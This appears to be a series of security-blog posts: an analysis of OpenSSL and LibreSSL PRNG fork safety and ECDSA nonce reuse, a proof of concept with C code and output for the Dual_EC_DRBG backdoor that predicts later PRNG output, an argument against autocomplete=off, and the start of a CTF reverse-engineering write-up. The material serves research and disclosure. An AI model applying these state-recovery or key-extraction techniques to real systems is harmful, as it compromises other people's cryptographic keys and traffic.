OpenSSL and LibreSSL PRNG, what’s different?

In July, a blog post from Andrew Ayer described the new, unsafe behaviour of portable LibreSSL 2.0.1. While it is right to say that it's unsafe, it is still safer than baseline OpenSSL and portable LibreSSL 2.0.2. That's what I'll explain in this blog post.

OpenSSL

In March 2014, I released two CVEs on OpenSSL consumers, stunnel (CVE-2014-0016) and libssh (CVE-2014-0017). I also wrote a paper about it in the French magazine MISC (issue 74). Unfortunately the paper is in French and not yet released under CC-BY-NC, so here are the major points:

  • The OpenSSL RAND_bytes() pool can be shared by two related processes, e.g. after a fork().
  • OpenSSL mitigates that problem by adding the result of getpid() to the entropy pool during a RAND_bytes() call. That means that two processes that share the same entropy pool and end up with the same PID will generate the same pseudorandom numbers.
  • That's what happens in stunnel in fork mode: a master process initializes the entropy pool and spawns children. As children die, PIDs are recycled, until a child reuses the PID of an earlier one and starts generating the same sequences of pseudorandom numbers.
  • Fortunately, OpenSSL calls RAND_seed() with the current unix time (time(NULL)) on every SSL handshake, so there's only a one-second window to exploit that weakness before having to start from scratch again. OSes with sequential PID generation are therefore less vulnerable than OSes with random PIDs (AFAIK only OpenBSD), because on OpenBSD it is more likely that two different children end up with the same PID within the same second.
  • In the end, the exploit I wrote for it didn't work, because the OpenSSL ECDSA_sign() function calls RAND_seed() with the content of the message to be signed, and the secret number k is different every time, mitigating the exploit:
int ECDSA_sign_ex(int type, const unsigned char *dgst, int dlen,
    unsigned char *sig, unsigned int *siglen, const BIGNUM *kinv,
    const BIGNUM *r, EC_KEY *eckey)
{
    ECDSA_SIG *s;
    RAND_seed(dgst, dlen);
    s = ECDSA_do_sign_ex(dgst, dlen, kinv, r, eckey);
    if (s == NULL)
    {
        *siglen = 0;
        return 0;
    }
    *siglen = i2d_ECDSA_SIG(s, &sig);
    ECDSA_SIG_free(s);
    return 1;
}

I have written exploit code for it: it doesn't manage to extract the private key (with OpenSSL), but it detects when a PRNG collision happens. Now, that's a weakness in OpenSSL that I suggested fixing with register_atfork(). It's different in LibreSSL.
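To make the failure mode concrete, here is a toy simulation of the problem (my own sketch in Python; this is not OpenSSL's pool code, just a model of "fork copies the pool, only getpid() is mixed back in"): two workers that inherit the same pool and get the same recycled PID produce identical "random" bytes.

import copy
import hashlib

class ToyPool:
    """Toy model of a fork-shared entropy pool (illustration only)."""
    def __init__(self, seed):
        self.state = hashlib.sha256(seed).digest()

    def rand_add(self, data):
        self.state = hashlib.sha256(self.state + data).digest()

    def rand_bytes(self, pid):
        # the only per-process data mixed back in is the PID
        self.rand_add(pid.to_bytes(4, "little"))
        return hashlib.sha256(self.state + b"output").digest()[:16]

master = ToyPool(b"seeded once in the master process")
child_a = copy.deepcopy(master)      # both children inherit a copy of the pool
child_b = copy.deepcopy(master)
print(child_a.rand_bytes(pid=4242).hex())
print(child_b.rand_bytes(pid=4242).hex())   # same recycled PID, identical output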

LibreSSL 2.0.1

Portable LibreSSL 2.0.1 is based on LibreSSL 2.0.1, which changed all that code to rely on arc4random(). On Linux, this function works more or less the same way as the OpenSSL PRNG did, with an entropy pool initialized in the process. We see the following properties:

  • fork() is detected by a change of PID (using getpid()). The PID is not merely stirred into the pool with RAND_add() (as OpenSSL does); instead the pool is reseeded, so it is not possible for two children to share the same pool content. However, as described by Ayer, a child may have the same PID as its grandparent and the PID change then goes undetected (see the sketch below).
  • RAND_add()/RAND_seed() were removed from the source code. They are no-ops, and references to them were removed everywhere in libssl and libcrypto, including the TLS session management and the ECDSA_sign() functions.
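A sketch of that 2.0.1-style check (my own pseudo-implementation in Python, not the actual LibreSSL code) makes the blind spot obvious: the decision to reseed rests entirely on comparing PID values.

import hashlib
import os

class Arc4RandomLike:
    """Toy PRNG with a getpid()-based fork check (illustration only)."""
    def __init__(self):
        self._pid = os.getpid()
        self._state = os.urandom(32)           # initial seeding

    def rand_bytes(self, n):
        # fork "detection": only the PID value is compared, so a grandchild
        # that happens to inherit its grandparent's recycled PID is missed
        if os.getpid() != self._pid:
            self._state = os.urandom(32)
            self._pid = os.getpid()
        out = b""
        while len(out) < n:
            self._state = hashlib.sha256(self._state).digest()
            out += self._state
        return out[:n]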

In order to test the strength of LibreSSL against the CVE-2014-0016 bug, I compiled stunnel 4.56 on Linux with a little addition:

int getpid(){return 31337;}

The exploit worked like a charm because LibreSSL didn't detect the PID change and reused the same entropy content on two sessions. This is of course a lab test, but I did the same with OpenSSL and couldn't extract the private key, because of the mitigations in ECDSA_sign().

ECDSA/DSA weakness

Without going too far into the mathematical details, it is important to know that both ECDSA and DSA rely on a random big integer, k, to perform the signature operation. This number must be perfectly random and never reused, because knowledge (or reuse) of it lets an attacker solve the ECDSA/DSA equations and easily calculate the private key.
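As a reminder (this is standard (EC)DSA algebra, not anything specific to OpenSSL or LibreSSL), two signatures (r, s_1) and (r, s_2) made with the same k over two digests h_1 and h_2 give away k, and then the private key x (q is the group order):

s_1 = k^-1 (h_1 + x r) (mod q)
s_2 = k^-1 (h_2 + x r) (mod q)
s_1 - s_2 = k^-1 (h_1 - h_2) (mod q)
=> k = (h_1 - h_2) / (s_1 - s_2) (mod q)
=> x = (s_1 k - h_1) / r (mod q)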
OpenSSL did RAND_add() on the actual message to be signed. This message is most likely public, but it is at least different on every attempt. This simple RAND_add()/RAND_seed() made my exploit impossible, as the value k would be chosen differently on every attempt.
On the contrary, LibreSSL removed that statement. The developers decided that the only source of randomness should be the PRNG.
While I agree that having a strong PRNG is a requirement for strong crypto, the choice of the secret value is a very well known weakness of ECDSA/DSA. DJB explains why Ed25519 was designed not to use an RNG at all for the selection of k:

Avoiding RNGs in signatures. It would be better if the signature system didn’t need new randomness for each signature in the first place. The RNG would be used much less frequently, and could afford to be designed more conservatively. We wouldn’t have to worry about the RNG taking entropy from malicious sources. We could move a long-term secret key into a highly protected hardware device for signing, without having to pay for an RNG in the hardware device and without having to worry about the quality of that RNG. We could have test vectors for signing functions, because those functions wouldn’t have a hidden RNG input.

This is exactly what was accomplished by a very simple modification to DSA suggested by George Barwood in February 1997: namely, “a prng is used to generate k, keyed with d (the private key), and seeded with e (the message digest).” Essentially the same idea was suggested by John Wigley in March 1997: “Why not derive the random number from the message to be signed therefore removing the need for a hardware rng (smartcards) or a complex and potentially fallible software attempt. … 1)Hash the message to be signed as usual and use that as the message in the signature algorithm. 2)hash the private key using the chaining variable state left by the previous hash, and use that as the random number.”

I think LibreSSL should implement a workaround such as this one to protect ECDSA against problems just like the ones we discussed, and have the secret value k generated as a function of the PRNG output, the message and the private key. It probably wouldn't pass FIPS certification, but who cares :)
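A minimal sketch of the idea (my own illustration, similar in spirit to RFC 6979 but with the PRNG output mixed in, as suggested above; this is not LibreSSL code): even if the PRNG repeats itself, k only repeats when the key and message repeat too.

import hashlib
import os

def derive_k(order, privkey_bytes, digest, rng=os.urandom):
    """Derive the (EC)DSA secret k from PRNG output, private key and digest.

    Illustration only: a real implementation must guarantee 1 <= k < order
    without modulo bias and use a proper extract/expand construction."""
    material = rng(32) + privkey_bytes + digest
    k = int.from_bytes(hashlib.sha512(material).digest(), "big") % order
    return k or 1   # avoid the degenerate k = 0 case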

LibreSSL 2.0.2

The LibreSSL team fixed that bug by using the register_atfork() function, which registers a callback that is invoked after every fork(). This function is part of POSIX and is portable enough, and better, it ensures that every fork() is detected the right way. This is not perfect (as Andrew wrote) and an explicit way to reset the entropy pool would be welcome.
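The same pattern exists at higher levels too; as an aside, here is what it looks like in Python with os.register_at_fork() (my own illustration, unrelated to the LibreSSL code): the child-side callback makes the reseed explicit, with no PID comparison and therefore no PID-reuse blind spot.

import os

class ForkSafePool:
    """Toy PRNG pool that is reliably reseeded in every forked child."""
    def __init__(self):
        self.state = os.urandom(32)
        # the callback fires in the child after *every* fork()
        os.register_at_fork(after_in_child=self.reseed)

    def reseed(self):
        self.state = os.urandom(32)

pool = ForkSafePool()
if os.fork() == 0:
    print("child :", pool.state.hex()[:16])
    os._exit(0)
os.wait()
print("parent:", pool.state.hex()[:16])   # differs from the child's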

Summary

This is a little summary of the different ways of handling fork() in the PRNG and ECDSA signatures as I discussed in the post:

name                       handling PID change          DSA/ECDSA
OpenSSL                    RAND_add(getpid())           RAND_add(message); k=random()
portable LibreSSL 2.0.1    if(getpid()!=pid) reset()    k=random()
portable LibreSSL 2.0.2    onfork() callback            k=random()
My ideal                   onfork() callback            k=hash(random() + privkey + message)

To conclude on this point, I would say that the bug that was found is not as bad as it looks, mainly because OpenSSL had a much worse behaviour for years and nobody ever complained. The way they solved it is the best I can think of, even though I think something should be done to protect the ECDSA and DSA signature process against future bugs in the PRNG.

To finish, I still think it's a little too soon to use portable LibreSSL in production: OpenSSL was cut down aggressively to fit into OpenBSD's security model, and the portable LibreSSL team may not be aware of all the traps left in the port. The behaviour of arc4random() on Linux was one of them.

Dual_EC_DRBG backdoor: a proof of concept

What’s this ?

Dual_EC_DRBG is a pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by the NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (it should be implemented in every FIPS-approved software) and some vendors even promoted this algorithm as the first source of randomness in their applications. Edit: I've been told this is not the case anymore in FIPS 140-2, but the cat is already out of the bag.

If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading.
Back in 2007, Dan Shumow and Niels Ferguson from Microsoft already showed that the Dual_EC_DRBG algorithm could be backdoored. It was also recently uncovered on Twitter that this algorithm was even patented in 2004 by Dan Brown (not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon for trapdoor/backdoor).
I will go a little bit further in explaining how it works and give proof-of-concept code, based on OpenSSL FIPS. To the best of my knowledge this is the only public proof of concept published today (correct me if I'm wrong).

Dual_EC_DRBG in a nutshell

The PRNG works as follows: it takes a seed that goes through a hashing algorithm. This data is then “fed” into two elliptic curve points, P and Q, before being slightly transformed and output.

In order to understand how the algorithm (and the backdoor) works, let’s see the relevant maths from Elliptic Curves:

Elliptic curves

Many types of elliptic curves exist. They are classified according to their properties and equations. We're going to look here at the curve NIST-p256, which is one of the three curves used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I'll try to (poorly) give you the basic theory of EC, but I'm no mathematician. Please forgive me and correct me if I'm wrong.

A curve is a set of points that follows a group structure. The curve is defined by several parameters (for NIST GFp curves):

  • Equation: all the members of that group (called points) must satisfy this equation y^2 = x^3 + ax + b (mod p)
  • Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined.
  • The order r: the order of the EC, i.e. the total number of points in the group.
  • a and b: fixed integers used in the curve's equation. a is set to -3 in NIST GF(p) curves.
  • A generator point defined by Gx and Gy: this point is considered the base element of the group.

Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve’s equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups:

  • They have an addition operation (+) defined between two points. (eg. P + Q).
  • This addition is commutative and associative.
  • Since you can add a point to itself as many times as you want, there is a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point.
  • That scalar multiplication is associative/commutative (a(bP) = b(aP)).
  • This scalar should be in the group of integers modulo r (the order of the curve).

The group of elliptic curves is very useful in cryptography, because an equation such as iQ = P is very easy to solve for Q or P (if you know i) but very hard to solve for i (if all you know is P and Q). This is the discrete logarithm problem in the EC group. That's why most of the time the points are used as public parameters/keys and scalars as their private counterparts.

All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a SHA-1 hash of a public seed, but nobody knows how the seed itself has been chosen.

Enough on the theory, let’s study the PRNG !

Dual_EC_DRBG internals

Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed.
[figure: Dual_EC_DRBG generation loop]
It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names). So I will use these variables:
i_n: Internal seed value.
o_n: External (output) value.
You can also see in the document two functions: phi and x(). phi is a function that does a mapping between a large integer and binary data. It doesn’t do much, in fact we can happily ignore it. x(P) simply gets the X coordinate of a point, as the X and Y coordinates are mostly redundant (as we’re going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this:

i_0 = randomseed()
i_1 = phi(x(i_0 P))
o_0 = phi(x(i_1 Q))
output(30 least significant bytes of o_0)
i_2 = phi(x(i_1 P))
o_1 = phi(x(i_2 Q))
output(30 least significant bytes of o_1)

An attack

Let’s begin working on o_0 and see if we can guess o_1 from its content. We can see that o_0 is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). On a NIST GFp curve, for every value of X there are zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let’s work on the hypothesis that we know the point A and that it is equal (by definition) to A = i_1 Q.

Then we have the equation:

i_1 Q = A
but if we have a (secret) relation between P and Q such that dQ = P, with d a secret number (our backdoor!):
i_1 d Q = d A (multiplying each side by d)
i_1 P = d A (replacing dQ with P)

If you look carefully at the unrolled algorithm, you will notice that if we know i_1 P we can calculate i_2 = phi(x(d A)), and we then have all the required information to calculate the subsequent o_1..o_n and i_2..i_n. All we need to do is guess a value of A (by bruteforce), multiply it by the secret value d, then multiply the resulting scalar with Q, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the first 30 bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have a one-in-two chance of success because of the two coexisting points with the same X coordinate. (Remember from high school: second degree equations can have two solutions.)
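To make the attack concrete, here is a toy re-implementation of the generator and of the backdoor on a very small, made-up curve (my own sketch: the curve, the constants d and i_0 and the helper functions are invented for illustration; the toy outputs the full x coordinate, so the 2^16 bruteforce over the truncated bytes is skipped):

# Toy Dual_EC_DRBG-style generator and backdoor on a tiny, made-up curve
# y^2 = x^3 - 3x + 5 over GF(10007). Real parameters are 256+ bits.
p, a, b = 10007, -3, 5
O = None                                   # point at infinity

def inv(n): return pow(n, p - 2, p)

def add(P, Q):
    if P is O: return Q
    if Q is O: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0: return O
    lam = ((3 * x1 * x1 + a) * inv(2 * y1) if P == Q
           else (y2 - y1) * inv(x2 - x1)) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):                             # double-and-add scalar multiplication
    R = O
    while k:
        if k & 1: R = add(R, P)
        P, k = add(P, P), k >> 1
    return R

def lift_x(x):                             # recover a point from x (works since p % 4 == 3)
    rhs = (x * x * x + a * x + b) % p
    y = pow(rhs, (p + 1) // 4, p)
    return (x, y) if y * y % p == rhs else None

def x_of(P):
    assert P is not O, "degenerate toy parameters; pick another d or seed"
    return P[0]

Q = next(pt for pt in map(lift_x, range(1, p)) if pt)   # any point of the curve will do
d = 1337                                   # the backdoor: P = d*Q
P = mul(d, Q)

i0 = 4242                                  # secret seed of the generator
i1 = x_of(mul(i0, P))
o0 = x_of(mul(i1, Q))                      # first output, observed by the attacker
o1 = x_of(mul(x_of(mul(i1, P)), Q))        # second output, to be predicted

A  = lift_x(o0)                            # A = +/- i1*Q; x(d*A) is the same either way
i2 = x_of(mul(d, A))                       # d*A = d*i1*Q = i1*P, so this is the next state
print("predicted:", x_of(mul(i2, Q)), "actual:", o1)    # the two values match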

Generating the constants

As you have seen before, for our backdoor to work we need to choose the P and Q points so that we hold the secret key to the backdoor. We have chosen to define P = dQ; however, that can't work, because P is a generator for the EC group and its value has already been fixed. So we have to find a value e such that Q = eP. This value can be calculated:

P = dQ
eP = edQ (mult. by e)

We need to find a value e such that ed = 1 for the curve C. The equation to solve is
ed = 1 (mod r), where r is the order of the EC.
The value of e is the inverse of d modulo r. We can then use that value to generate Q.

/* 256 bits value randomly generated */
unsigned char d[]=
    "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5"
    "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a";
d_bn = BN_new();
assert(d_bn != NULL);

BN_bin2bn(d, 32, d_bn);
/* ensure d is well inside the group order */
EC_GROUP_get_order(curve, r, bn_ctx);
BN_mod(d_bn, d_bn, r, bn_ctx);
/* calculate Q = d * Generator + (NULL * NULL) */
ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx);
assert(ret == 1);

/* calculate e = d^-1 (mod r) */
e_bn = BN_new();
assert(e_bn != NULL);

/* invert d to get the value of e */
assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx));

(note: I know I mixed up e with d between the code and blog post but that doesn’t change anything at all.)

Implementation

You can find the proof of concept code on my github. I’ll comment how it works:

Install OpenSSL/FIPS

Most of the work needed for this POC was actually fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the right APIs to use. OpenSSL FIPS and OpenSSL are two different pieces of software that share some of their codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few Bignum functions usable from inside my application. I haven't been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I thought was caused by incompatibilities). The README explains the steps to take (please read it).

Recover point A

If you remember, we have the 30 least significant bytes of the X coordinate, which means we need to bruteforce our way to A point candidates. This can easily be done in a loop over the 2^16 possibilities. OpenSSL doesn't provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it's not implemented anywhere). We have to solve the curve's equation:
y^2 = x^3 - 3x + b (mod p)
Solving such an equation for y is not so different from the equation solving you learned in high school:

for (prefix = 0; prefix <= 0x10000 ; ++prefix){
    x_bin[0] = prefix >> 8;
    x_bin[1] = prefix & 0xff;
    BN_bin2bn(x_bin, 32, x_value);
    //bnprint("X value", x_value);

    /* try to find y such as */
    /* y^2 = x^3 - 3x + b (mod p) */
    /* tmp1 = x^2 */
    ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx);
    assert(ret == 1);

    ret = BN_set_word(tmp2, 3);
    assert(ret == 1);

    /* tmp1 = x^2 - 3 */
    ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx);
    assert(ret == 1);

    /* tmp1 = (x^2 -3) * x */
    ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx);
    assert(ret == 1);

    /* tmp1 = x^3 - 3x + b */
    ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx);
    assert(ret == 1);

    //bnprint("Y squared", tmp1);
    if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) {
        //printf("value %x match !\n", prefix);
        if(verbose)
            bnprint("calculated Y", y_value);

        BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx);
        if(verbose)
            bnprint("calculated Y opposite", y_value);
        test_candidate(buffer + 30, x_value, y_value, bn_ctx);
        valid_points += 2;
    }
}

I mentioned that for every X, there were zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0 and two for all other answers. There are then two valid points (A_x, A_y) and (A_x, -A_y) where -A_y is the opposite of the first value modulo p. Explanation (thanks Rod):

y^2 = a^2
y^2 - a^2 = 0
(y-a) (y + a) = 0
y = a or y = -a
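For the curious, when p ≡ 3 (mod 4), which is the case for the P-256 prime, the square root has a simple closed form that can be checked in a couple of lines of Python (BN_mod_sqrt implements the general Tonelli-Shanks algorithm, which covers this case and the harder ones):

# Square roots mod p when p % 4 == 3: if a is a quadratic residue,
# then y = a^((p+1)/4) mod p is a square root of a, and p - y is the other.
p = 2**256 - 2**224 + 2**192 + 2**96 - 1   # the NIST P-256 prime, p % 4 == 3
a = 1234567 ** 2 % p                        # a value known to be a quadratic residue

y = pow(a, (p + 1) // 4, p)
assert y * y % p == a
assert (p - y) * (p - y) % p == a           # -y is the "opposite" root, as above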

Recover PRNG state and generate next block

This part is pretty straightforward. We import the estimated x and y values, verify that they are on the curve (they should be!), then multiply that point by the secret value. We then multiply Q by the resulting scalar and we get 30 bytes of the next output. If the first two bytes match, we have successfully guessed the remaining 28 bytes. That attack can recover everything output by that PRNG until a reseed.

/* create the point A based on calculated coordinates x and y */
ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx);
assert(ret == 1);
/* Normally the point should be on curve but we never know */
if (!EC_POINT_is_on_curve(curve, point, bn_ctx))
    goto end;

/* calculates i2 = phi(x(e.A)) */
ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx);
assert(ret ==1);

ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx);
assert(ret ==1);
if(verbose)
    bnprint ("i2_x", i2x);

/* calculate o1 = phi(x(i2 * Q)) */
ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx);
assert(ret == 1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx);
if(verbose)
    bnprint ("o1_x", o1x);
BN_bn2bin(o1x, o1x_bin);
if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){
    printf("Found a match !\n");
    bnprint("A_x", x);
    bnprint("A_y", y);
    print_hex("prediction", o1x_bin + 4, 28);
}

Let’s run it !


aris@kalix86:~/dualec$ ./dual_ec_drbg_poc
s at start of generate:
E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485
[omitted: many output from openssl]
y coordinate at end of mul:
0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010
r in generate is:
96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437
Random bits written:
000000000000000000000000000000000000000000000000000000000000
y coordinate at end of mul:
5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429
s in generate:
C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E
[omitted: many output from openssl]
PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e
Found a match !
A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437
A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010
prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Reviewed 65502 valid points (candidates for A)
PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3

Yikes !

Conclusion

It is quite obvious in light of the recent revelations from Snowden that this weakness was introduced on purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I'm not the only one to be angry about it. You could use it with custom P and Q values, but that's very seldom possible. Nevertheless, having a whole EC point parameter leaked in the output makes it too easy to distinguish from true randomness, and it should never have made it into any spec at all. Let's all bury that PRNG and the “security” companies bribed by the NSA to enable backdoors by default for thirty silver coins.

edits: fixed Dan Brown’s employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes
note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation. Only NSA (and people with access to the key) can exploit the PRNG weakness.
note2: Some questions were raised about the security of that secret value. The secret value I speak of is the scalar used to generate Q. As the EC is a cyclic group, it is proven that for every P and Q there is a value e such that eP = Q.
How long would it take to bruteforce that value? Finding the value e is equivalent to solving the discrete logarithm problem in NIST-p256. ANSSI states that a 256-bit GF(p) curve has the same security as a 128-bit symmetric cipher key. Keys of 80 bits and above are believed to be impossible to crack today, so we can say that value is more likely to be stolen by an NSA employee than cracked.

edit3: NIST-p256 is a cyclic group and that’s what makes the note2 relation possible
edit4: There’s an awesome video explaining elliptic curves and Dual-ec-drbg.

The war against autocomplete=off: let my browser remember passwords !

I noticed a while ago that many security professionals advise their customers to use ‘autocomplete=off’ in the password fields of login screens. It also started to scratch an itch when my password manager wouldn't store passwords for a few websites, so I started to look for opinions before forging my own.

Websites advising to disable autocomplete

A few blogs, forum posts and even Stack Overflow advise disabling autocomplete on password fields. Owasp.org itself advises preventing web browsers from caching sensitive data on the client side.

What are the advantages of disabling autocomplete

The two main security advantages are the following:

  • Avoid caching sensitive data on the client side (credit card numbers)
  • Avoid storing the password in an insecure and hackable client-side database

The first bullet is in my opinion completely legitimate. Some information, like credit card numbers, should not be remembered in web forms, because nothing lets the browser understand that the field is sensitive, that its content should not be stored unencrypted on the hard drive, nor shown in plaintext at the first occasion when the user types a few digits in a text box (making shoulder surfing easy). Passwords, however, are different: they have their own class of input box and browsers know how to manage them. I will come back to this later.

The second advantage of that policy is that passwords won't be remembered in case the user's computer has been hacked. That's true in a few scenarios, like when the user has malware on his computer or his laptop gets lost or stolen. I would respond that no software password management solution can really help when the end user's computer cannot be trusted. In many cases, malware can just wait for the user to type his password to steal it. To efficiently protect against malware, users should be provided a physical device used to authenticate and sign any sensitive operation. That's the only working mitigation in my opinion; we use these in Belgium for e-banking and it's working pretty well.

Now, let’s get started with the cons of autocomplete=off

The most problematic drawback of autocomplete policies is that they interact badly with password managers. Password managers are in my opinion the best we can do to work around the inherent insecurity of passwords: don't remember your password, let your password manager do it for you (and better, and without writing it down in plaintext). When you set autocomplete=off, you're effectively opting out of all the advantages password managers provide to users, advantages which are specifically designed to avoid pitfalls like the stolen-laptop scenario.

The policy is also hard to change locally: the security policy is completely under the control of the server, which means users don't control how they manage the security of their credentials, unless their password manager willingly overrides the autocomplete attribute.

Another big issue is the consequence for the security of the passwords users choose for these services. Let's say that you have to choose a password for a web service. This password:

  • Has to be >8 characters, including capitals, digits and special characters (i.e. hard to remember)
  • Cannot be stored on your computer or on paper for further reference (i.e. has to be remembered)
  • Cannot be shared with other websites
  • Must sometimes be written on embedded devices like a smartphone

Tell me how I am supposed to fulfill these requirements if I need 20 websites daily to do my work (my password manager has about a hundred entries). It's simply impossible. As a consequence, users are going to work around this policy and either choose a very simple password, or a somewhat strong password that is the same on all services. The password manager permits the user to store a secure password on a per-service basis. Breaking the password manager pushes the user towards all the other behaviours. The lack of good web password managers on mobile platforms is also one of the reasons for poor passwords (no capitals, special characters or digits) and password reuse on these devices.

Password managers protect against phishing. Don't believe it? Just go to a website (a phishing site) that has nothing to do with the legitimate one, and the password does not autocomplete itself. This should ring a bell even for inexperienced users. They may not even know the password, and having to go through a few extra steps to retrieve it will probably put some distance between the user and the phisher.

Please note that if you combine this policy with disabling copy and paste into the password fields (I'm looking at you, Blizzard!), I hate you. Your policy enforces weak passwords instead of promoting strong ones.

In conclusion/TL;DR

You may have understood it; my biggest problem with autocomplete=off policies is that they break password managers, which in my opinion are the best tool we have to manage the hell that passwords are. By setting this attribute, you opt the user out of password management and leave them with less optimal techniques like weak passwords or password reuse.
What to do? Maybe promote password managers. Let the user decide on the password policy. Do not rely on passwords alone but use strong authentication with hardware devices. Update password managers to ignore autocomplete=off, which may already be the case for a few of them (I tested Firefox Sync and KeePass; they don't have that functionality).

I will happily read anything you may have to add to this, especially if I’m wrong.

Nuit Du Hack CTF 2013 : k1986 write-up

I participated in NDH2013 this year and worked on a very interesting binary: k1986. It comes with two files:

aris@kali64:~/ndh2013$ ls -l k1986 license.db 
-rwxr-xr-x 1 aris aris 14984 jun 23 02:07 k1986
-rwx------ 1 aris aris   360 jun 22 22:54 license.db
aris@kali64:~/ndh2013$ file k1986-orig license.db 
k1986-orig: ELF 64-bit LSB executable, x86-64, invalid version (SYSV), for GNU/Linux 2.6.32, 
dynamically linked (uses shared libs), corrupted section header size
license.db: data

It's starting well: a corrupted ELF file. The content of license.db seems encrypted, so my first guess was that it was a DRM server of some kind. It becomes more fun when you try to check what it does:

aris@kali64:~/ndh2013$ objdump -t k1986-orig 
objdump: k1986-orig: File format not recognized
aris@kali64:~/ndh2013$ gdb --quiet ./k1986-orig 
"/home/aris/ndh2013/k1986-orig": not in executable format: Format de fichier non reconnu
(gdb) quit
aris@kali64:~/ndh2013$ nm ./k1986-orig 
nm: ./k1986-orig: File format not recognized
aris@kali64:~/ndh2013$ ldd ./k1986-orig 
	 n'est pas un exécutable dynamique

So all classic tools give up… but that’s ok, let’s gdb-attach the process..

aris@kali64:~/ndh2013$ gdb --quiet -p 23627
Attaching to process 23627
"/home/aris/ndh2013/k1986": not in executable format: Format de fichier non reconnu
(gdb) info reg 
eax            0xfffffe00	-512
ecx            0xffffffff	-1
edx            0x5c4c	23628
ebx            0x18a70700	413599488
esp            0xf9154780	0xf9154780
ebp            0xf91547e8	0xf91547e8
esi            0x0	0
edi            0x18a709d0	413600208
eip            0x18e02e75	0x18e02e75
eflags         0x246	[ PF ZF IF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/i $eip
=> 0x18e02e75:	Cannot access memory at address 0x18e02e75
(gdb) x/$ $rip
A syntax error in expression, near `$rip'.
(gdb)

That's the real fun. No matter what I did to that binary, I never managed to make gdb attach to it in 64-bit mode. I tried to make the binary unreadable (chmod 100) or to patch the missing fields/sections, but it did no good. I lost too much time on this one (by the way, if you managed to make gdb work on this, I'd appreciate it a lot).
Time to launch IDA. We discover a dynamically loadable executable that's linked to libpthread and libc. Since the section header table is broken, IDA was not able to match the PLT and GOT entries with those of the binary. However it was smart enough to see a list of exports. We see very classic things for such a binary (open, socket, bind, listen, accept, read, write, close, printf, …) and others more unusual (pthread_mutex_lock). At that point I freaked out that it would be a very hard-to-understand multithreaded program, as I had no debugger yet.
When you have no symbols, you have to recognize the PLT and GOT by yourself. As I couldn't simply gdb into the process to make it do the symbol resolution for me, I took another approach and used the RTLD capability of overriding symbols:

$ cat intercept.c
#include <stdio.h>
#include <stdlib.h>

int bind(){
  void **i;
  i = &i;
  printf("bind: %p\n",i[2]);
  exit(0);
}

$ gcc -fPIC -shared -o intercept.so intercept.c && LD_PRELOAD=./intercept.so ./k1986
bind: xxxxxx

[image: img1]

